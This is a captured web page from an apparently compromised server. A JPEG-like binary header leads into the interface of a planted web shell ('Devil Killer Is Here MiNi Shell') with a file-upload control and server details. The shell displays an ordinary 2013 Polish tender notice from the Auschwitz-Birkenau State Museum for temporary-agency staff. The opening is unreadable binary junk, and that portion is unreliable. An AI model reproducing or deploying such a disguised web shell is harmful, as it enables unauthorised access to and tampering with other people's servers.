JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130222/76060-N-2013.html

<p class="kh_header"><b>Oświęcim: świadczenie usług przez agencję pracy tymczasowej polegających na kierowaniu osób do wykonywania pracy tymczasowej  dla Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu.</b><br>
<b>Numer ogłoszenia: 76060 - 2013; data zamieszczenia: 22.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 33 844 8003, faks 33 843 18 62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.auschwitz.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług przez agencję pracy tymczasowej polegających na kierowaniu osób do wykonywania pracy tymczasowej  dla Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług przez agencję pracy tymczasowej polegających na kierowaniu osób do wykonywania pracy tymczasowej w miarę zapotrzebowania zgłaszanego przez Zamawiającego. Usługi będą świadczone na zasadach określonych  w ustawie z dnia 9 lipca 2003 r. o zatrudnieniu pracowników tymczasowych (tj. Dz. U. z 2003 r. Nr 166, poz. 1608 z późn. zm.).. 
2.	Zakładana liczba pracowników tymczasowych to 14 osób w tym: 
9 pracowników  obsługi odwiedzających Muzeum tj: 5 kasjerów (kod zawodu: 523001) i 2 dyspozytorów (kod zawodu: 422502) oraz 2  bileterów (kod zawodu: 962901). 2 pracowników administracyjnych tj.: 1 referent ds. administracyjnych (kod zawodu: 411090) i 1 referent ds. zamówień publicznych (kod zawodu: 411090). 3 pracowników ogólnobudowlanych tj.: 1 rzemieślnik - specjalista /cieśla/ (kod zawodu: 711501) i 	1 rzemieślnik - specjalista /murarz/ (kod zawodu: 711202) oraz 1 rzemieślnik - specjalista /dekarz/ (kod zawodu: 712101). 

3.	Szczegółowy zakres obowiązków będzie zależał od stanowiska, które zostanie powierzone poszczególnym pracownikom tymczasowym.

3.1. obowiązki na stanowisku: kasjer
a) udzielanie informacji odwiedzającym,
b) rejestrowanie odwiedzających,
c) pobieranie opłat i wystawianie faktur za usługi przewodnickie oraz inne  usługi związane z obsługą odwiedzających zgodnie z obowiązującym cennikiem, w tym:
- wpłata pieniędzy ze sprzedaży do kasy Muzeum,
- wpłata pieniędzy upoważnionej osobie podmiotu świadczącego usługi na rzecz odwiedzających w ramach systemu audio (system słuchawkowy),
- obsługa kas  fiskalnych oraz terminali,
d) sporządzanie raportów dziennych i przekazywanie ich do Działu Finansowo-Księgowego,
e) sporządzanie raportów dziennych firmy Antenna Audio i przekazywanie ich pracownikowi firmy,
f)  przechowywanie i archiwizacja dokumentów finansowych Muzeum i firmy Antenna Audio,
g) wykonywanie innych poleceń przełożonych ze strony Zamawiającego nie wykraczających poza zakres obowiązków etatowych pracowników Zamawiającego.
Na w/w stanowisku Zamawiający wymaga zawarcia przez Wykonawcę z pracownikiem tymczasowym umowy o odpowiedzialności za powierzone mienie zgodnie z art. 124 Kodeksu Pracy (tj. Dz. U. z 1998 r., nr 21, poz. 94 z późn. zm.).

3.2. obowiązki na stanowisku: dyspozytor
a) udzielanie informacji odwiedzającym,
b) rejestrowanie odwiedzających,
c) przydzielanie przewodników do zorganizowanych grup odwiedzających,
d) ustalanie z kierownikami grup (pilotami) programu zwiedzania i przekazywanie tych informacji kasjerom oraz przewodnikom,
e) ustalanie  programu  seansów filmowych kina Muzeum w porozumieniu z kinooperatorami
 i kasjerami,
f) wykonywanie innych poleceń przełożonych ze strony Zamawiającego nie wykraczających poza zakres obowiązków etatowych pracowników Zamawiającego.

3.3. obowiązki na stanowisku:  bileter
a) regulowanie wejść  zorganizowanych grup odwiedzających i  indywidualnych osób odwiedzających (tzw. tur),
b) kontrolowanie biletów na projekcję filmu dokumentalnego Oświęcim - Auschwitz,
c) udzielanie informacji związanych z godzinami tur, filmu oraz ich wersji językowej,
d)  udzielanie podstawowych informacji dotyczących topografii miejsca oraz sprawnego przemieszczania się odwiedzających po tym terenie,
e)  wykonywanie innych poleceń przełożonych ze strony Zamawiającego nie wykraczających poza zakres obowiązków etatowych pracowników Zamawiającego.

3.4 obowiązki na stanowisku :  referent ds. administracyjnych
a) wykonywanie podstawowych czynności biurowych (wysyłanie faxów, e-maili, kserowanie dokumentów itp.),
b) obsługa spotkań i wizyt gości Muzeum,
c) prowadzenie kalendarza spotkań Zastępców Dyrektora,
d) pomoc w organizacji uroczystości rocznicowych i innych,
e) prowadzenie spraw związanych z wyjazdami Dyrektora,
f) pomoc w wysyłce sprawozdań Muzeum,
g) przygotowanie dokumentów do archiwizacji,
h) wykonywanie innych poleceń wynikających z potrzeb Zamawiającego.

3.5 obowiązki na stanowisku:  referent ds. zamówień publicznych
a) zaznajamianie się z obowiązującymi aktami normatywnymi dot. zamówień publicznych oraz innymi aktami prawnymi,
b) przygotowywanie projektów dokumentów sporządzanych na potrzeby postępowań w sprawie udzielenia zamówień publicznych,
c) uczestniczenie w komisjach przetargowych,
d) weryfikowanie wstępne projektów zapytań ofertowych,
e) udzielanie informacji w zakresie obowiązujących przepisów,
f) uczestnictwo w szkoleniach,
g) wykonywanie innych poleceń wynikających z potrzeb zamawiającego.

3.6	obowiązki na stanowisku: rzemieślnik - specjalista /cieśla/
a) wykonywanie prac interwencyjnych, remontów w ramach bieżącej konserwacji obiektów murowanych znajdujących się na terenie Muzeum zabezpieczających przed dalszym zniszczeniem obiektów odcinka BI oraz wszystkie obiekt z nim związane:
	zabezpieczanie ścian murowanych przez wykonanie tymczasowych konstrukcji zabezpieczających (przypory, stemple itp.),
	prace związane z naprawą bieżących uszkodzeń konstrukcji murowanych, betonowych i drewnianych,
	prace pomocnicze przy uzupełnianiu ubytków cegieł i zaprawy elementów murowanych,
	zabezpieczanie kominów murowanych,
	remonty i uszczelnienia pokrycia dachowego (wymiany dachówek, wymiana i uzupełnianie obróbek blacharskich, przekładki gąsiorów),
	wykonywanie uzupełnień oraz naprawa ubytków pokrycia dachowego,
	wzmacnianie lub wymiana uszkodzonych fragmentów więźby dachowej, 
	doraźne zabezpieczanie więźby dachowej przez wykonanie tymczasowych podparć,
	aplikacja środków ochrony p.poż oraz ochrony przed korozją, istniejących  elementów drewnianych,
	obsługa urządzeń, maszyn i elektronarzędzi związanych z wykonywanymi pracami,
	montaż podestów, kładek, rusztowań, ogrodzeń itp.,
	 wykonywanie innych prac konserwacyjnych obiektów na terenie PMAB oraz czynności z nimi powiązanych (np. transport, załadunek i rozładunek, prace porządkowe, odśnieżane dachów),
	organizowanie miejsca pracy zgodnie z wymogami bhp, ppoż. oraz ochrony środowiska,
	wykonywanie innych prac ogólnobudowlanych związanych z bieżąca konserwacją obiektów budowlanych na polecenie przełożonego,
b) prace interwencyjne, zabezpieczające przed dalszym zniszczeniem bloku rezerwatowego o nr 28 (A-28)- prace interwencyjne/ bieżąca konserwacja pokrycia dachowego:
	remonty i uszczelnienia pokrycia dachowego (wymiany dachówek, wymiana i uzupełnianie obróbek blacharskich, przekładki gąsiorów),
	wykonywanie uzupełnień pokrycia dachowego,
	wymiana lub wzmacnianie uszkodzonych fragmentów więźby dachowej,
	aplikacja środków ochrony p.poż oraz ochrony przed korozją, istniejących  elementów drewnianych,
	zabezpieczanie kominów murowanych,
	wykonywanie innych prac ogólnobudowlanych związanych z bieżąca konserwacją obiektów budowlanych na polecenie przełożonego,
c) dbanie o powierzone materiały i sprzęt, używanie ich zgodnie z przeznaczeniem, zabezpieczanie przed kradzieżą bądź zniszczeniem.
3.7	 obowiązki na stanowisku: rzemieślnik - specjalista /murarz/
a) wykonywanie prac interwencyjnych,  remontów w ramach bieżącej konserwacji obiektów murowanych znajdujących się na terenie Muzeum zabezpieczających przed dalszym zniszczeniem obiektów odcinka BI oraz wszystkie obiekt z nim związane:
	zabezpieczanie ścian murowanych przez wykonanie tymczasowych konstrukcji zabezpieczających (przypory, stemple itp.),
	prace związane z naprawą bieżących uszkodzeń konstrukcji murowanych, betonowych i drewnianych,
	uzupełnianie ubytków cegieł i zaprawy elementów murowanych,
	oczyszczanie, przemurowanie i zabezpieczanie kominów murowanych,
	usuwanie roślinności porastającej kominy,
	prace pomocnicze przy wykonywaniu uzupełnień oraz naprawie ubytków pokrycia dachowego,
	wzmacnianie lub wymiana uszkodzonych fragmentów więźby dachowej, 
	doraźne zabezpieczanie więźby dachowej przez wykonanie tymczasowych podparć,
	wykonywanie drobnych elementów betonowych prefabrykowanych (słupki ogrodzeniowe, płyty betonowe itp.)
	obsługa urządzeń, maszyn i elektronarzędzi związanych z wykonywanymi pracami,
	montaż podestów, kładek, rusztowań, ogrodzeń itp.,
	 wykonywanie innych prac konserwacyjnych obiektów na terenie PMAB oraz czynności z nimi powiązanych (np. transport, załadunek i rozładunek, prace porządkowe, odśnieżane dachów),
	organizowanie miejsca pracy zgodnie z wymogami bhp, ppoż. oraz ochrony środowiska,
	wykonywanie innych prac ogólnobudowlanych związanych z bieżąca konserwacją obiektów budowlanych na polecenie przełożonego,
b) prace interwencyjne, zabezpieczające przed dalszym zniszczeniem bloku rezerwatowego o nr 28 (A-28)- prace interwencyjne/ bieżąca konserwacja pokrycia dachowego:
	prace pomocnicze przy wykonywaniu uzupełnień poszycia dachowego,
	wymiana lub wzmacnianie uszkodzonych fragmentów więźby dachowej,
	oczyszczanie, przemurowanie i zabezpieczanie kominów murowanych,
	wykonywanie innych prac ogólnobudowlanych związanych z bieżąca konserwacją obiektów budowlanych na polecenie przełożonego,
c) dbanie o powierzone materiały i sprzęt, używanie ich zgodnie z przeznaczeniem, zabezpieczanie przed kradzieżą bądź zniszczeniem.
3.8	obowiązki na stanowisku:  rzemieślnik - specjalista /dekarz/
a) wykonywanie prac interwencyjnych, remontów w ramach bieżącej konserwacji obiektów murowanych znajdujących się na terenie Muzeum zabezpieczających przed dalszym zniszczeniem obiektów odcinka BI oraz wszystkie obiekt z nim związane:
	zabezpieczanie ścian murowanych przez wykonanie tymczasowych konstrukcji zabezpieczających (przypory, stemple itp.),
	prace związane z naprawą bieżących uszkodzeń konstrukcji murowanych, betonowych i drewnianych,
	prace pomocnicze przy uzupełnianiu ubytków cegieł i zaprawy elementów murowanych,
	zabezpieczanie kominów murowanych,
	remonty i uszczelnienia pokrycia dachowego (wymiany dachówek, wymiana i uzupełnianie obróbek blacharskich, przekładki gąsiorów),
	wykonywanie uzupełnień oraz naprawa ubytków pokrycia dachowego,
	wzmacnianie lub wymiana uszkodzonych fragmentów więźby dachowej, 
	doraźne zabezpieczanie więźby dachowej przez wykonanie tymczasowych podparć,
	aplikacja środków ochrony p.poż oraz ochrony przed korozją, istniejących  elementów drewnianych,
	obsługa urządzeń, maszyn i elektronarzędzi związanych z wykonywanymi pracami,
	montaż podestów, kładek, rusztowań, ogrodzeń itp.,
	 wykonywanie innych prac konserwacyjnych obiektów na terenie PMAB oraz czynności z nimi powiązanych (np. transport, załadunek i rozładunek, prace porządkowe, odśnieżane dachów),
	organizowanie miejsca pracy zgodnie z wymogami bhp, ppoż. oraz ochrony środowiska,
	wykonywanie innych prac ogólnobudowlanych związanych z bieżąca konserwacją obiektów budowlanych na polecenie przełożonego,
b) prace interwencyjne, zabezpieczające przed dalszym zniszczeniem bloku rezerwatowego o nr 28 (A-28)- prace interwencyjne/ bieżąca konserwacja pokrycia dachowego:
	remonty i uszczelnienia pokrycia dachowego (wymiany dachówek, wymiana i uzupełnianie obróbek blacharskich, przekładki gąsiorów),
	wykonywanie uzupełnień pokrycia dachowego,
	wymiana lub wzmacnianie uszkodzonych fragmentów więźby dachowej,
	aplikacja środków ochrony p.poż oraz ochrony przed korozją, istniejących  elementów drewnianych,
	zabezpieczanie kominów murowanych,
	wykonywanie innych prac ogólnobudowlanych związanych z bieżąca konserwacją obiektów budowlanych na polecenie przełożonego,
c) dbanie o powierzone materiały i sprzęt, używanie ich zgodnie z przeznaczeniem, zabezpieczanie przed kradzieżą bądź zniszczeniem.

4. Zamawiający ma prawo uszczegółowić  sposób i zakres wykonywania zadań, o których mowa w pkt  3, dla pracowników tymczasowych zatrudnionych  na stanowiskach , o których mowa w pkt 2. 

5. Wykonawca jest odpowiedzialny wobec Zamawiającego za przestrzeganie obowiązków, o których mowa w pkt 3,  przez pracowników tymczasowych zatrudnionych  na stanowiskach, o których mowa w pkt 2.
UWAGA: Wykonawca ma obowiązek sporządzenia zakresów obowiązków, o których mowa w pkt 3,  dla pracowników tymczasowych zatrudnionych  na stanowiskach, o których mowa w pkt 2. w trzech jednobrzmiących egzemplarzach, z którymi pracownicy tymczasowi mają obowiązek zapoznać się 
i podpisać przed przystąpieniem do pracy. Jeden z egzemplarzy powinien otrzymać pracownik tymczasowy a drugi Zamawiający.
6. Wymagania kwalifikacyjne wobec w/w  pracowników  tymczasowych obejmują:

6.1 pracowników obsługi odwiedzających Muzeum:
 a) posiadanie minimum średniego wykształcenia,
 b) znajomość języka angielskiego w stopniu komunikatywnym,
c) mile widziana   podstawowa znajomość  innego języka obcego (np. niemieckiego, hiszpańskiego, włoskiego, francuskiego),
d) komunikatywność,
e) asertywność,
f) umiejętność pracy w zespole,
g) umiejętność pracy pod presją czasu. 
UWAGA
Dodatkowo wymaga się wobec osób, które będą pełnić obowiązki kasjera, umiejętności obsługi kas fiskalnych i terminali.

6.2 pracowników administracyjnych:
a)	wykształcenie średnie, a w przypadku stanowiska referent ds. zamówień publicznych - ukończony co najmniej III rok na Wydziale Prawa i Administracji, kierunek: prawo,
b)	komunikatywność,
c)	asertywność,
d)	umiejętność pracy w zespole,
e)	umiejętność pracy pod presją czasu.

6.3	pracowników ogólnobudowlanych:
6.3.1	rzemieślnik -  specjalista /cieśla/
a) wykształcenie i doświadczenie:
ukończona szkoła min. zawodowa o kierunku budowlanym w specjalności cieśla, oraz min. 3 lata udokumentowanego doświadczenia w zawodzie na stanowisku związanym z wznoszeniem bądź remontem obiektów budowlanych, w tym: doświadczenie na stanowisku: cieśla - min. 2 lata
lub
niezależnie od kierunku wykształcenia, min. 6 lat udokumentowanego, doświadczenia w pracy na stanowisku związanym z wznoszeniem bądź remontem obiektów budowlanych, w tym: doświadczenie na stanowisku: cieśla - min. 2 lata,

b) umiejętności: 
	wznoszenia konstrukcji drewnianych stałych i tymczasowych,
	umiejętność w zakresie napraw i remontów konstrukcji ciesielskich dachowych,
	umiejętność stawiania rusztowań,
	wiedza ogólna w zakresie budownictwa,
	znajomość asortymentu materiałów budowlanych t.j. kleje, masy uszczelniające, pianki poliuretanowe i inne preparaty chemiczne wchodzące w skład chemii budowlanej, w zakresie zastosowań i sposobów ich używania,
	znajomość obsługi maszyn urządzeń i elektronarzędzi budowlanych (m.in piły tarczowe stołowe, pilarki łańcuchowe, betoniarki, wiertarki, młoty udarowe elektryczne, szlifierki kątowe i inne),

c) wymagania dodatkowe: 
	dopuszczenie do pracy na wysokości powyżej 3m, 
	znajomość i stosowanie przepisów BHP przy wykonywaniu prac budowlanych,
	pełna sprawność psychoruchowa wymagana ze względu na charakter wykonywanych czynności,
	doświadczenie w pracy przy obiektach zabytkowych będzie dodatkowym atutem, 
	prawo jazdy kat. B. będzie dodatkowym atutem,
	umiejętność spawania gazowego, lub elektrycznego mile widziana,
	uprawnienie do kierowania wózkiem widłowym będzie dodatkowym atutem.,
	sumienność i dokładność w wykonywaniu powierzonych zadań,
	umiejętność współpracy w zespole.

6.3.2	rzemieślnik - specjalista /murarz/
a) 	wykształcenie i doświadczenie:
ukończona szkoła min. zawodowa o kierunku budowlanym specjalności murarz oraz min. 3 lata udokumentowanego doświadczenia w zawodzie na stanowisku związanym z wznoszeniem bądź remontem obiektów budowlanych, w tym: doświadczenie na stanowisku: murarz - min. 2 lata
lub
niezależnie od kierunku wykształcenia, min. 6 lat udokumentowanego, doświadczenia w pracy na stanowisku związanym z wznoszeniem bądź remontem obiektów budowlanych, w tym: doświadczenie na stanowisku: murarz - min. 2 lata,

b) umiejętności: 
	znajomość technik wykonywania i remontów konstrukcji murowanych,
	umiejętność stawiania rusztowań,
	umiejętność w zakresie układania i naprawy powłok tynkarskich, 
	umiejętność wykonywania i wbudowywania zapraw oraz drobnych elementów betonowych prefabrykowanych, 
	wiedza ogólna w zakresie budownictwa,
	znajomość asortymentu materiałów budowlanych t.j. kleje, masy uszczelniające, pianki poliuretanowe i inne preparaty chemiczne wchodzące w skład chemii budowlanej w zakresie zastosowań i sposobów ich używania,
	znajomość obsługi maszyn urządzeń i elektronarzędzi budowlanych (m.in piły tarczowe stołowe, pilarki łańcuchowe, betoniarki, wiertarki, młoty udarowe elektryczne, szlifierki kątowe i inne),

c) wymagania dodatkowe: 
	dopuszczenie do pracy na wysokości powyżej 3m, 
	znajomość i stosowanie przepisów BHP przy wykonywaniu prac budowlanych,
	pełna sprawność psychoruchowa wymagana ze względu na charakter wykonywanych czynności,
	doświadczenie w pracy przy obiektach zabytkowych będzie dodatkowym atutem, 
	prawo jazdy kat. B. będzie dodatkowym atutem,
	umiejętność spawania gazowego, lub elektrycznego mile widziana,
	uprawnienie do kierowania wózkiem widłowym będzie dodatkowym atutem.,
	sumienność i dokładność w wykonywaniu powierzonych zadań,
	umiejętność współpracy w zespole.


6.3.3	rzemieślnik - specjalista /dekarz/

a) wykształcenie i doświadczenie:
ukończona szkoła min. zawodowa o kierunku budowlanym oraz min. 3 lata udokumentowanego doświadczenia w zawodzie na stanowisku związanym z wznoszeniem bądź remontów obiektów budowlanych, w tym: doświadczenie na stanowisku: dekarz - min. 2 lata
lub
niezależnie od kierunku wykształcenia, min. 6 lat udokumentowanego, doświadczenia w pracy na stanowisku związanym z wznoszeniem bądź remontów obiektów budowlanych, w tym: doświadczenie na stanowisku: dekarz - min. 2 lata
b) umiejętności: 
	umiejętność  układania i remontów pokryć dachowych - ceramicznych, cementowych, bitumicznych, wykonywanie obróbek blacharskich pokrycia dachowego,
	umiejętność stawiania rusztowań,
	znajomość asortymentu materiałów budowlanych t.j. kleje, masy uszczelniające, pianki poliuretanowe i inne preparaty chemiczne wchodzące w skład chemii budowlanej w zakresie zastosowań i sposobów ich używania,
	znajomość obsługi maszyn urządzeń i elektronarzędzi budowlanych (m.in piły tarczowe stołowe, pilarki łańcuchowe, betoniarki, wiertarki, młoty udarowe elektryczne, szlifierki kątowe i inne,).

c) wymagania dodatkowe: 
	dopuszczenie do pracy na wysokości powyżej 3m, 
	znajomość i stosowanie przepisów BHP przy wykonywaniu prac budowlanych,
	pełna sprawność psychoruchowa wymagana ze względu na charakter wykonywanych czynności,
	doświadczenie w pracy przy obiektach zabytkowych będzie dodatkowym atutem, 
	prawo jazdy kat. B. będzie dodatkowym atutem,
	umiejętność spawania gazowego, lub elektrycznego mile widziana,
	uprawnienie do kierowania wózkiem widłowym będzie dodatkowym atutem.,
	sumienność i dokładność w wykonywaniu powierzonych zadań,umiejętność współpracy w zespole.
7. Wymienieni pracownicy tymczasowi będą zatrudnieni: 
7.1 pracownicy obsługi odwiedzających Muzeum w systemie równoważnego czasu pracy z przedłużeniem dobowego wymiaru maksymalnie do 12 godzin na dobę w trzymiesięcznym okresie rozliczeniowym. Przedłużony dobowy wymiar czasu pracy jest równoważony krótszym dobowym wymiarem czasu pracy w niektórych dniach lub dniami wolnymi od pracy. Praca według harmonogramu, który będzie ustalany przez Zamawiającego. Zatrudnieni pracownicy będą pracować codziennie w godzinach między 7:00 a 19:00, oprócz kwietnia i października w tych miesiącach będą pracować w godzinach między 7:00 a 18:00. Pracownicy będą pracować również w soboty, niedziele i święta, praca ta będzie wynikała z harmonogramu czasu pracy ustalonego na okres 3 miesięcy ,
7.2 pracownicy administracji w systemie podstawowego czasu pracy w jednomiesięcznym okresie rozliczeniowym, 
7.3 pracownicy ogólnobudowlani w systemie podstawowego czasu pracy w jednomiesięcznym okresie rozliczeniowym. 
UWAGA:
1. Zamawiający nie przewiduje wystąpienia pracy w godzinach nadliczbowych i nocnych, jednak w przypadku konieczności wykonania pracy w w/w godzinach, wynagrodzenie za tą pracę nie będzie obciążać Wykonawcy, ponieważ zostanie ono ujęte w wynagrodzeniu brutto pracownika tymczasowego, od którego zostanie naliczony % marży Wykonawcy.
2. Wynagrodzenie za czas choroby,  urlopu wypoczynkowego lub  ekwiwalent urlopowy  pracownika tymczasowego, zostanie wypłacone w ramach jego wynagrodzenia.
3. W przypadku gdy  pracownik tymczasowy w trakcie umowy z Wykonawcą  na rzecz Zamawiającego nabędzie prawo do nagrody jubileuszowej na Zasadach określonych w ZUZP dla Pracowników Państwowego Muzeum Auschwitz - Birkenau w Oświęcimiu, Zamawiający pokryje koszty wypłaty jubileuszu, zgodnie z zapisami w niniejszym ZUZP. 
Ponieważ nagroda jubileuszowa jest świadczeniem dodatkowym, Zamawiający wymaga, aby Wykonawca nie naliczał marży od powyższego świadczenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających do 50 % wartości zamówieia podstawowego w zakresie zwiększenia liczby pracowników tymczasowych wykonujących pracę tymczasową lub wydłużenia czasu wykonywania pracy tymczasowej przez pracowników tymczasowych skierowanych do Zamawiającego przez agencję pracy tymczasowej,</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.60.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości: 8.000,00 zł 
(słownie:  osiem  tysięcy złotych PLN 00/100)
	Wadium należy wnieść przed upływem terminu składania ofert.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
-   pieniądzu - przelewem na konto Zamawiającego:
Pekao S.A. Oddział Bielsko-Biała ul. Grunwaldzka 40a 
IBAN:PL: 45 1240 2975 1111 0010 3268 4307
(za termin wniesienia wadium w pieniądzu uważa się datę uznania na rachunku Zamawiającego),
- poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach ubezpieczeniowych,
- gwarancjach bankowych
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
